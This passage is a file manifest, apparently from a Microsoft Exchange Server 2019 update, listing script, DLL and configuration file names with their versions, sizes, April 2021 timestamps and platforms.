Configurenetworkprotocolparameters.ps1| Not applicable| 19,810| 04-Apr-2021| 08:36| Not applicable
Configuresmbipsec.ps1| Not applicable| 39,868| 04-Apr-2021| 08:37| Not applicable
Configure_enterprisepartnerapplication.ps1| Not applicable| 22,323| 04-Apr-2021| 08:37| Not applicable
Connectfunctions.ps1| Not applicable| 37,141| 04-Apr-2021| 08:43| Not applicable
Connect_exchangeserver_help.xml| Not applicable| 30,420| 04-Apr-2021| 08:43| Not applicable
Consoleinitialize.ps1| Not applicable| 24,272| 04-Apr-2021| 08:31| Not applicable
Convertoabvdir.ps1| Not applicable| 20,089| 04-Apr-2021| 08:37| Not applicable
Converttomessagelatency.ps1| Not applicable| 14,572| 04-Apr-2021| 08:38| Not applicable
Convert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,805| 04-Apr-2021| 08:37| Not applicable
Create_publicfoldermailboxesformigration.ps1| Not applicable| 27,952| 04-Apr-2021| 08:38| Not applicable
Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts_exsmime.dll| 15.2.858.9| 380,792| 04-Apr-2021| 08:31| x64
Cts_microsoft.exchange.data.common.dll| 15.2.858.9| 1,686,936| 04-Apr-2021| 08:32| x86
Cts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 04-Apr-2021| 06:23| Not applicable
Cts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86
Cts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86
Cts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86
Cts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86
Cts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:38| x86
Cts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86
Cts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:39| x86
Cts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,696| 04-Apr-2021| 08:39| x86
Cts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:38| x86
Cts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86
Cts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86
Cts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86
Cts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:35| x86
Dagcommonlibrary.ps1| Not applicable| 60,226| 04-Apr-2021| 08:36| Not applicable
Dependentassemblygenerator.exe| 15.2.858.9| 22,416| 04-Apr-2021| 08:39| x86
Diaghelper.dll| 15.2.858.9| 66,968| 04-Apr-2021| 08:32| x86
Diagnosticscriptcommonlibrary.ps1| Not applicable| 16,334| 04-Apr-2021| 08:38| Not applicable
Disableinmemorytracing.ps1| Not applicable| 13,402| 04-Apr-2021| 08:37| Not applicable
Disable_antimalwarescanning.ps1| Not applicable| 15,229| 04-Apr-2021| 08:37| Not applicable
Disable_outsidein.ps1| Not applicable| 13,690| 04-Apr-2021| 08:33| Not applicable
Disklockerapi.dll| Not applicable| 22,392| 04-Apr-2021| 08:38| x64
Dlmigrationmodule.psm1| Not applicable| 39,620| 04-Apr-2021| 08:36| Not applicable
Dsaccessperf.dll| 15.2.858.9| 45,960| 04-Apr-2021| 08:30| x64
Dscperf.dll| 15.2.858.9| 32,640| 04-Apr-2021| 08:42| x64
Dup_cts_microsoft.exchange.data.common.dll| 15.2.858.9| 1,686,936| 04-Apr-2021| 08:32| x86
Dup_ext_microsoft.exchange.data.transport.dll| 15.2.858.9| 601,464| 04-Apr-2021| 08:33| x86
Ecpperfcounters.xml| Not applicable| 31,144| 04-Apr-2021| 08:28| Not applicable
Edgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Edgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86
Edgetransport.exe| 15.2.858.10| 49,536| 04-Apr-2021| 08:39| x86
Eext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 04-Apr-2021| 06:23| Not applicable
Eext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:39| x86
Eext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86
Eext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86
Eext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:43| x86
Eext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86
Eext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,688| 04-Apr-2021| 08:44| x86
Eext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x86
Eext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:38| x86
Eext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:38| x86
Eext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:39| x86
Eext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,664| 04-Apr-2021| 08:39| x86
Eext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.858.9| 12,672| 04-Apr-2021| 08:44| x86
Enableinmemorytracing.ps1| Not applicable| 13,404| 04-Apr-2021| 08:35| Not applicable
Enable_antimalwarescanning.ps1| Not applicable| 17,603| 04-Apr-2021| 08:36| Not applicable
Enable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,624| 04-Apr-2021| 08:36| Not applicable
Enable_crossforestconnector.ps1| Not applicable| 18,634| 04-Apr-2021| 08:38| Not applicable
Enable_outlookcertificateauthentication.ps1| Not applicable| 22,952| 04-Apr-2021| 08:37| Not applicable
Enable_outsidein.ps1| Not applicable| 13,687| 04-Apr-2021| 08:33| Not applicable
Engineupdateserviceinterfaces.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x86
Escprint.dll| 15.2.858.9| 20,360| 04-Apr-2021| 08:39| x64
Ese.dll| 15.2.858.9| 3,741,584| 04-Apr-2021| 08:31| x64
Eseback2.dll| 15.2.858.9| 350,080| 04-Apr-2021| 08:29| x64
Esebcli2.dll| 15.2.858.9| 318,328| 04-Apr-2021| 08:41| x64
Eseperf.dll| 15.2.858.9| 108,928| 04-Apr-2021| 08:40| x64
Eseutil.exe| 15.2.858.9| 425,368| 04-Apr-2021| 08:42| x64
Esevss.dll| 15.2.858.9| 44,440| 04-Apr-2021| 08:35| x64
Etweseproviderresources.dll| 15.2.858.9| 101,256| 04-Apr-2021| 08:39| x64
Eventperf.dll| 15.2.858.9| 59,768| 04-Apr-2021| 08:27| x64
Exchange.depthtwo.types.ps1xml| Not applicable| 40,093| 04-Apr-2021| 08:44| Not applicable
Exchange.format.ps1xml| Not applicable| 649,694| 04-Apr-2021| 08:43| Not applicable
Exchange.partial.types.ps1xml| Not applicable| 44,323| 04-Apr-2021| 08:43| Not applicable
Exchange.ps1| Not applicable| 20,807| 04-Apr-2021| 08:43| Not applicable
Exchange.support.format.ps1xml| Not applicable| 26,535| 04-Apr-2021| 08:38| Not applicable
Exchange.types.ps1xml| Not applicable| 365,149| 04-Apr-2021| 08:44| Not applicable
Exchangeudfcommon.dll| 15.2.858.9| 122,744| 04-Apr-2021| 08:39| x86
Exchangeudfs.dll| 15.2.858.9| 272,776| 04-Apr-2021| 08:39| x86
Exchmem.dll| 15.2.858.9| 86,400| 04-Apr-2021| 08:29| x64
Exchsetupmsg.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:39| x64
Exdbfailureitemapi.dll| Not applicable| 27,032| 04-Apr-2021| 08:38| x64
Exdbmsg.dll| 15.2.858.9| 230,800| 04-Apr-2021| 08:39| x64
Exeventperfplugin.dll| 15.2.858.9| 25,472| 04-Apr-2021| 08:32| x64
Exmime.dll| 15.2.858.9| 364,928| 04-Apr-2021| 08:39| x64
Exportedgeconfig.ps1| Not applicable| 27,431| 04-Apr-2021| 08:37| Not applicable
Export_mailpublicfoldersformigration.ps1| Not applicable| 18,594| 04-Apr-2021| 08:38| Not applicable
Export_modernpublicfolderstatistics.ps1| Not applicable| 29,242| 04-Apr-2021| 08:36| Not applicable
Export_outlookclassification.ps1| Not applicable| 14,374| 04-Apr-2021| 08:39| Not applicable
Export_publicfolderstatistics.ps1| Not applicable| 23,157| 04-Apr-2021| 08:37| Not applicable
Export_retentiontags.ps1| Not applicable| 17,080| 04-Apr-2021| 08:37| Not applicable
Exppw.dll| 15.2.858.9| 83,352| 04-Apr-2021| 08:39| x64
Exprfdll.dll| 15.2.858.9| 26,520| 04-Apr-2021| 08:43| x64
Exrpc32.dll| 15.2.858.9| 2,029,448| 04-Apr-2021| 08:34| x64
Exrw.dll| 15.2.858.9| 28,056| 04-Apr-2021| 08:30| x64
Exsetdata.dll| 15.2.858.9| 2,779,528| 04-Apr-2021| 08:39| x64
Exsetup.exe| 15.2.858.10| 35,224| 04-Apr-2021| 08:39| x86
Exsetupui.exe| 15.2.858.10| 471,936| 04-Apr-2021| 08:39| x86
Extrace.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:31| x64
Ext_microsoft.exchange.data.transport.dll| 15.2.858.9| 601,464| 04-Apr-2021| 08:33| x86
Exwatson.dll| 15.2.858.9| 44,936| 04-Apr-2021| 08:27| x64
Fastioext.dll| 15.2.858.9| 60,312| 04-Apr-2021| 08:39| x64
Fil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,630| 04-Apr-2021| 08:38| Not applicable
Fil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,227| 04-Apr-2021| 08:39| Not applicable
Fil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,759| 04-Apr-2021| 08:39| Not applicable
Fil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,404| 04-Apr-2021| 08:33| Not applicable
Fil220d95210c8697448312eee6628c815c| Not applicable| 303,656| 04-Apr-2021| 08:33| Not applicable
Fil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,758| 04-Apr-2021| 08:39| Not applicable
Fil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,627| 04-Apr-2021| 08:39| Not applicable
Fil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,603| 04-Apr-2021| 08:38| Not applicable
Fil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 08:28| Not applicable
Fil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,344| 04-Apr-2021| 08:39| Not applicable
Fil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,258| 04-Apr-2021| 08:39| Not applicable
Fil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,753| 04-Apr-2021| 08:39| Not applicable
Fil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable
Fil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable
Fil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable
Fil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,729| 04-Apr-2021| 08:39| Not applicable
Fil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,759| 04-Apr-2021| 08:39| Not applicable
Fil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable
Fil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,633| 04-Apr-2021| 08:38| Not applicable
Fil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable
Filaa49badb2892075a28d58d06560f8da2| Not applicable| 785,657| 04-Apr-2021| 08:39| Not applicable
Filae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,756| 04-Apr-2021| 08:38| Not applicable
Filb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,633| 04-Apr-2021| 08:38| Not applicable
Filb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 08:29| Not applicable
Filbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,639,490| 04-Apr-2021| 08:28| Not applicable
Filc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,776| 04-Apr-2021| 08:39| Not applicable
Filcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,633| 04-Apr-2021| 08:39| Not applicable
Fild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 04-Apr-2021| 08:27| Not applicable
Filf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,639| 04-Apr-2021| 08:39| Not applicable
Filfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 08:27| Not applicable
Filteringconfigurationcommands.ps1| Not applicable| 18,267| 04-Apr-2021| 08:34| Not applicable
Filteringpowershell.dll| 15.2.858.9| 223,096| 04-Apr-2021| 08:28| x86
Filteringpowershell.format.ps1xml| Not applicable| 29,668| 04-Apr-2021| 08:27| Not applicable
Filtermodule.dll| 15.2.858.9| 180,120| 04-Apr-2021| 08:28| x64
Fipexeuperfctrresource.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:32| x64
Fipexeventsresource.dll| 15.2.858.9| 44,944| 04-Apr-2021| 08:33| x64
Fipexperfctrresource.dll| 15.2.858.9| 32,664| 04-Apr-2021| 08:27| x64
Firewallres.dll| 15.2.858.9| 72,584| 04-Apr-2021| 08:32| x64
Fms.exe| 15.2.858.9| 1,350,016| 04-Apr-2021| 08:28| x64
Forefrontactivedirectoryconnector.exe| 15.2.858.9| 110,968| 04-Apr-2021| 08:39| x64
Fpsdiag.exe| 15.2.858.9| 18,824| 04-Apr-2021| 08:28| x86
Fsccachedfilemanagedlocal.dll| 15.2.858.9| 822,144| 04-Apr-2021| 08:29| x64
Fscconfigsupport.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:28| x86
Fscconfigurationserver.exe| 15.2.858.9| 430,976| 04-Apr-2021| 08:27| x64
Fscconfigurationserverinterfaces.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:32| x86
Fsccrypto.dll| 15.2.858.9| 208,792| 04-Apr-2021| 08:28| x64
Fscipcinterfaceslocal.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:27| x86
Fscipclocal.dll| 15.2.858.9| 38,264| 04-Apr-2021| 08:27| x86
Fscsqmuploader.exe| 15.2.858.9| 453,528| 04-Apr-2021| 08:28| x64
Getucpool.ps1| Not applicable| 19,811| 04-Apr-2021| 08:36| Not applicable
Getvalidengines.ps1| Not applicable| 13,274| 04-Apr-2021| 08:36| Not applicable
Get_antispamfilteringreport.ps1| Not applicable| 15,829| 04-Apr-2021| 08:38| Not applicable
Get_antispamsclhistogram.ps1| Not applicable| 14,655| 04-Apr-2021| 08:38| Not applicable
Get_antispamtopblockedsenderdomains.ps1| Not applicable| 15,711| 04-Apr-2021| 08:39| Not applicable
Get_antispamtopblockedsenderips.ps1| Not applicable| 14,775| 04-Apr-2021| 08:39| Not applicable
Get_antispamtopblockedsenders.ps1| Not applicable| 15,498| 04-Apr-2021| 08:39| Not applicable
Get_antispamtoprblproviders.ps1| Not applicable| 14,689| 04-Apr-2021| 08:38| Not applicable
Get_antispamtoprecipients.ps1| Not applicable| 14,790| 04-Apr-2021| 08:39| Not applicable
Get_dleligibilitylist.ps1| Not applicable| 42,376| 04-Apr-2021| 08:36| Not applicable
Get_exchangeetwtrace.ps1| Not applicable| 28,983| 04-Apr-2021| 08:36| Not applicable
Get_publicfoldermailboxsize.ps1| Not applicable| 15,062| 04-Apr-2021| 08:38| Not applicable
Get_storetrace.ps1| Not applicable| 51,871| 04-Apr-2021| 08:39| Not applicable
Huffman_xpress.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:30| x64
Importedgeconfig.ps1| Not applicable| 77,280| 04-Apr-2021| 08:37| Not applicable
Import_mailpublicfoldersformigration.ps1| Not applicable| 29,516| 04-Apr-2021| 08:37| Not applicable
Import_retentiontags.ps1| Not applicable| 28,858| 04-Apr-2021| 08:38| Not applicable
Inproxy.dll| 15.2.858.9| 85,896| 04-Apr-2021| 08:34| x64
Installwindowscomponent.ps1| Not applicable| 34,523| 04-Apr-2021| 08:39| Not applicable
Install_antispamagents.ps1| Not applicable| 17,929| 04-Apr-2021| 08:39| Not applicable
Install_odatavirtualdirectory.ps1| Not applicable| 17,983| 04-Apr-2021| 08:38| Not applicable
Interop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 107,392| 04-Apr-2021| 08:30| Not applicable
Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 20,360| 04-Apr-2021| 08:33| Not applicable
Interop.certenroll.dll| 15.2.858.9| 142,736| 04-Apr-2021| 08:31| x86
Interop.licenseinfointerface.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:33| x86
Interop.netfw.dll| 15.2.858.9| 34,184| 04-Apr-2021| 08:28| x86
Interop.plalibrary.dll| 15.2.858.9| 72,600| 04-Apr-2021| 08:28| x86
Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.858.9| 27,016| 04-Apr-2021| 08:33| Not applicable
Interop.taskscheduler.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:27| x86
Interop.wuapilib.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:39| x86
Interop.xenroll.dll| 15.2.858.9| 39,816| 04-Apr-2021| 08:31| x86
Kerbauth.dll| 15.2.858.9| 62,848| 04-Apr-2021| 08:42| x64
Licenseinfointerface.dll| 15.2.858.9| 643,464| 04-Apr-2021| 08:29| x64
Lpversioning.xml| Not applicable| 20,470| 04-Apr-2021| 08:34| Not applicable
Mailboxdatabasereseedusingspares.ps1| Not applicable| 31,920| 04-Apr-2021| 08:39| Not applicable
Managedavailabilitycrimsonmsg.dll| 15.2.858.9| 138,640| 04-Apr-2021| 08:34| x64
Managedstorediagnosticfunctions.ps1| Not applicable| 126,277| 04-Apr-2021| 08:39| Not applicable
Managescheduledtask.ps1| Not applicable| 36,372| 04-Apr-2021| 08:38| Not applicable
Manage_metacachedatabase.ps1| Not applicable| 51,127| 04-Apr-2021| 08:36| Not applicable
Mce.dll| 15.2.858.9| 1,693,576| 04-Apr-2021| 08:27| x64
Measure_storeusagestatistics.ps1| Not applicable| 29,487| 04-Apr-2021| 08:39| Not applicable
Merge_publicfoldermailbox.ps1| Not applicable| 22,663| 04-Apr-2021| 08:37| Not applicable
Microsoft.database.isam.dll| 15.2.858.9| 127,880| 04-Apr-2021| 08:39| x86
Microsoft.dkm.proxy.dll| 15.2.858.9| 26,008| 04-Apr-2021| 08:32| x86
Microsoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.858.9| 68,488| 04-Apr-2021| 08:27| x86
Microsoft.exchange.activemonitoring.eventlog.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:34| x64
Microsoft.exchange.addressbook.service.dll| 15.2.858.10| 233,368| 04-Apr-2021| 08:38| x86
Microsoft.exchange.addressbook.service.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:32| x64
Microsoft.exchange.airsync.airsyncmsg.dll| 15.2.858.9| 43,400| 04-Apr-2021| 08:38| x64
Microsoft.exchange.airsync.comon.dll| 15.2.858.10| 1,776,000| 04-Apr-2021| 08:33| x86
Microsoft.exchange.airsync.dll1| 15.2.858.10| 505,216| 04-Apr-2021| 08:29| Not applicable
Microsoft.exchange.airsynchandler.dll| 15.2.858.10| 76,160| 04-Apr-2021| 08:39| x86
Microsoft.exchange.anchorservice.dll| 15.2.858.10| 135,568| 04-Apr-2021| 08:32| x86
Microsoft.exchange.antispam.eventlog.dll| 15.2.858.9| 23,448| 04-Apr-2021| 08:28| x64
Microsoft.exchange.antispamupdate.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:44| x64
Microsoft.exchange.antispamupdatesvc.exe| 15.2.858.10| 27,016| 04-Apr-2021| 08:39| x86
Microsoft.exchange.approval.applications.dll| 15.2.858.10| 53,656| 04-Apr-2021| 08:33| x86
Microsoft.exchange.assistants.dll| 15.2.858.10| 925,056| 04-Apr-2021| 08:33| x86
Microsoft.exchange.assistants.eventlog.dll| 15.2.858.9| 25,976| 04-Apr-2021| 08:32| x64
Microsoft.exchange.assistants.interfaces.dll| 15.2.858.9| 43,400| 04-Apr-2021| 08:33| x86
Microsoft.exchange.audit.azureclient.dll| 15.2.858.10| 15,232| 04-Apr-2021| 08:39| x86
Microsoft.exchange.auditlogsearch.eventlog.dll| 15.2.858.9| 14,720| 04-Apr-2021| 08:32| x64
Microsoft.exchange.auditlogsearchservicelet.dll| 15.2.858.10| 70,528| 04-Apr-2021| 08:43| x86
Microsoft.exchange.auditstoragemonitorservicelet.dll| 15.2.858.10| 94,600| 04-Apr-2021| 08:39| x86
Microsoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:28| x64
Microsoft.exchange.authadmin.eventlog.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:27| x64
Microsoft.exchange.authadminservicelet.dll| 15.2.858.10| 36,744| 04-Apr-2021| 08:39| x86
Microsoft.exchange.authservicehostservicelet.dll| 15.2.858.9| 15,752| 04-Apr-2021| 08:39| x86
Microsoft.exchange.autodiscover.configuration.dll| 15.2.858.9| 79,752| 04-Apr-2021| 08:43| x86
Microsoft.exchange.autodiscover.dll| 15.2.858.10| 396,184| 04-Apr-2021| 08:33| x86
Microsoft.exchange.autodiscover.eventlogs.dll| 15.2.858.9| 21,400| 04-Apr-2021| 08:27| x64
Microsoft.exchange.autodiscoverv2.dll| 15.2.858.10| 57,240| 04-Apr-2021| 08:32| x86
Microsoft.exchange.bandwidthmonitorservicelet.dll| 15.2.858.10| 14,744| 04-Apr-2021| 08:39| x86
Microsoft.exchange.batchservice.dll| 15.2.858.10| 35,720| 04-Apr-2021| 08:34| x86
Microsoft.exchange.cabutility.dll| 15.2.858.9| 276,352| 04-Apr-2021| 08:31| x64
Microsoft.exchange.certificatedeployment.eventlog.dll| 15.2.858.9| 16,256| 04-Apr-2021| 08:33| x64
Microsoft.exchange.certificatedeploymentservicelet.dll| 15.2.858.10| 25,984| 04-Apr-2021| 08:39| x86
Microsoft.exchange.certificatenotification.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64
Microsoft.exchange.certificatenotificationservicelet.dll| 15.2.858.10| 23,448| 04-Apr-2021| 08:39| x86
Microsoft.exchange.clients.common.dll| 15.2.858.10| 377,752| 04-Apr-2021| 08:31| x86
Microsoft.exchange.clients.eventlogs.dll| 15.2.858.9| 83,848| 04-Apr-2021| 08:30| x64
Microsoft.exchange.clients.owa.dll| 15.2.858.10| 2,971,008| 04-Apr-2021| 08:30| x86
Microsoft.exchange.clients.owa2.server.dll| 15.2.858.10| 5,029,784| 04-Apr-2021| 08:32| x86
Microsoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.858.9| 893,848| 04-Apr-2021| 08:27| x86
Microsoft.exchange.clients.security.dll| 15.2.858.10| 413,584| 04-Apr-2021| 08:38| x86
Microsoft.exchange.clients.strings.dll| 15.2.858.9| 924,552| 04-Apr-2021| 08:33| x86
Microsoft.exchange.cluster.bandwidthmonitor.dll| 15.2.858.10| 31,624| 04-Apr-2021| 08:38| x86
Microsoft.exchange.cluster.common.dll| 15.2.858.9| 52,112| 04-Apr-2021| 08:31| x86
Microsoft.exchange.cluster.common.extensions.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:31| x86
Microsoft.exchange.cluster.diskmonitor.dll| 15.2.858.10| 33,664| 04-Apr-2021| 08:39| x86
Microsoft.exchange.cluster.replay.dll| 15.2.858.10| 3,515,288| 04-Apr-2021| 08:31| x86
Microsoft.exchange.cluster.replicaseeder.dll| 15.2.858.9| 108,416| 04-Apr-2021| 08:34| x64
Microsoft.exchange.cluster.replicavsswriter.dll| 15.2.858.10| 288,648| 04-Apr-2021| 08:44| x64
Microsoft.exchange.cluster.shared.dll| 15.2.858.9| 625,544| 04-Apr-2021| 08:29| x86
Microsoft.exchange.common.agentconfig.transport.dll| 15.2.858.9| 86,408| 04-Apr-2021| 08:27| x86
Microsoft.exchange.common.componentconfig.transport.dll| 15.2.858.9| 1,830,288| 04-Apr-2021| 08:28| x86
Microsoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:32| x86
Microsoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.858.9| 466,328| 04-Apr-2021| 08:33| x86
Microsoft.exchange.common.directory.domtvariantconfig.dll| 15.2.858.10| 25,984| 04-Apr-2021| 08:27| x86
Microsoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.858.9| 38,288| 04-Apr-2021| 08:27| x86
Microsoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.858.9| 102,800| 04-Apr-2021| 08:32| x86
Microsoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.858.9| 48,520| 04-Apr-2021| 08:32| x86
Microsoft.exchange.common.diskmanagement.dll| 15.2.858.9| 67,480| 04-Apr-2021| 08:33| x86
Microsoft.exchange.common.dll| 15.2.858.9| 172,936| 04-Apr-2021| 08:27| x86
Microsoft.exchange.common.encryption.variantconfig.dll| 15.2.858.9| 113,544| 04-Apr-2021| 08:27| x86
Microsoft.exchange.common.il.dll| 15.2.858.9| 13,720| 04-Apr-2021| 08:27| x86
Microsoft.exchange.common.inference.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:29| x86
Microsoft.exchange.common.optics.dll| 15.2.858.9| 63,872| 04-Apr-2021| 08:32| x86
Microsoft.exchange.common.processmanagermsg.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:33| x64
Microsoft.exchange.common.protocols.popimap.dll| 15.2.858.9| 15,248| 04-Apr-2021| 08:33| x86
